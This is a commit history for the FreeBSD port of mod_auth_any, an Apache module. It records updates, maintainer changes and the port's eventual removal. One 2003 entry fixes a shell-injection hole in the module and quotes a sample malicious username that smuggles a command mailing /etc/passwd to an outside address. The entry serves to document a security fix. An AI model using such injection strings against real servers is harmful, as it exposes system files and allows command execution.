| Commit History - (may be incomplete: see SVNWeb link above for full details) |
| Date | By | Description |
03 Jan 2011 14:38:01
1.5
|
garga  |
Remove expired ports:
2011-01-01 audio/emphasis: abandoned upstream
2011-01-01 converters/ecore-txt: abandoned upstream
2011-01-01 deskutils/estickies: abandoned upstream
2011-01-01 devel/ecore-job: abandoned upstream
2011-01-01 devel/engrave: abandoned upstream
2011-01-01 devel/evfs: abandoned upstream
2011-01-01 devel/ruby-ecore: abandoned upstream
2011-01-01 graphics/exhibit: abandoned upstream
2011-01-01 graphics/epsilon: abandoned upstream
2011-01-01 graphics/esmart: abandoned upstream
2011-01-01 graphics/ruby-edje: abandoned upstream
2011-01-01 graphics/ruby-esmart: abandoned upstream
2011-01-01 graphics/ruby-evas: abandoned upstream (Only the first 15 lines of the commit message are shown above ) |
20 Oct 2010 03:24:22
1.5
|
pgollucci  |
- Set EXPIRATION_DATE, DEPRECATED for mod_ ports who's upstream is toast
With Hat: apache@ |
17 May 2009 07:24:35
1.5
|
pgollucci  |
- Mark SAFE apache@ ports MAKE_JOBS_SAFE=yes |
17 Mar 2007 16:47:51
1.5
|
clement  |
- remove dead WWW entry |
04 Dec 2005 16:16:17
1.5
|
clement  |
- Convert to new USE_APACHE
- Add SHA256 |
04 Dec 2005 00:18:15
1.5
|
clement  |
- prepare removal of www/apache2 in favor of www/apache20 for naming
consistency
- add entries in UPDATING (for apache22 too)
PR: ports/78119
Repocopied by: marcus |
18 Oct 2004 19:22:28
1.5
|
clement  |
- Update to 1.5 |
18 Aug 2004 16:21:56
1.4
|
clement  |
- Assign maintainership to freshly created apache@ mailing list |
08 Aug 2004 09:35:18
1.4
|
clement  |
- Update to 1.4
Now mod_auth_any works with apache2! |
16 Apr 2004 13:38:17
1.3.2
|
clement  |
- Utilize Makefile.modules.3rd |
07 Feb 2004 17:16:21
1.3.2
|
clement  |
- SIZEify distinfo |
13 Jan 2004 15:04:51
1.3.2
|
clement  |
- Update my email address
Approved and reviewed by: erwin (mentor) |
07 Nov 2003 09:12:58
1.3.2
|
marcus  |
Use the new Apache bits from bsd.port.mk.
Submitted by: dinoex |
06 Oct 2003 13:00:08
1.3.2
|
edwin  |
[update orphand port] www/mod_auth_any: Update to 1.3.2 and take maintainership
- update to 1.3.2
- update WWW
- take maintainership
PR: ports/57413
Submitted by: Clement Laforet <sheepkiller@cultdeadsheep.org> |
25 Mar 2003 04:23:11
1.0.2_1
|
lioux  |
o Fix vulnerability that allows execution of arbitrary commands on
the server with the uid of the apache process. Background [1]:
"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")
"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."
o Fix this by adding a escaping function from [2]. Then, modifying
this function appropriately with ideas from [3]. Apply the new
escaping code to mod_auth_any.
o Bump PORTREVISION
Submitted by: Security Officer (nectar),
Red Hat Security Response Team <security@redhat.com> [1]
Obtained from: mod_auth_any CVS [2],
nalin@redhat.com [3] |
20 Feb 2003 19:15:38
1.0.2
|
knu  |
De-pkg-comment. |
09 Sep 2002 18:30:10
1.0.2
|
dinoex  |
support appache13-modssl by defining APACHE_PORT in /etc/make.conf
others variants of the apache ports can be used too. |
10 Apr 2001 23:28:40 
|
will  |
Add mod_auth_any 1.0.2, an apache module to use any command line program to
authenticate a user. |